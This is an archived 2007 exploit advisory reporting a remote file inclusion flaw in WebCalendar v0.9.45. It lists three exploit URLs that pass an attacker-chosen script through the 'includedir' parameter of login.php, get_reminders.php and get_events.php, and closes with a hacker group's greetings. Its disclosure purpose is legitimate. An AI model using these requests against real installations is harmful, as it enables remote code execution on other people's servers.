Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16365
HistoryMar 16, 2007 - 12:00 a.m.

WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include

2007-03-1600:00:00
vulners.com
581

|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |

Vendor : http://www.k5n.us/webcalendar.php
Bug in :
login.php
get_reminders.php
get_events.php
-------------------------------------------------------------------------------
EXPLOIT :
http://localhost/[calendar]/ws/login.php?includedir=[evilscript]
http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript]
http://localhost/[calendar]/ws/get_events.php?includedir=[evilscript]
-------------------------------------------------------------------------------
Greetz : Leo,hardose,s4mi,fucker_net,The Casper,Broken-Proxy,Simo64,
exe_crack,b0rizq,righterz,dragon,rachidox All Moroccan HackerX;
---------------------[ [Mor0ccan ISLAM Defenders Team] ]-------------------------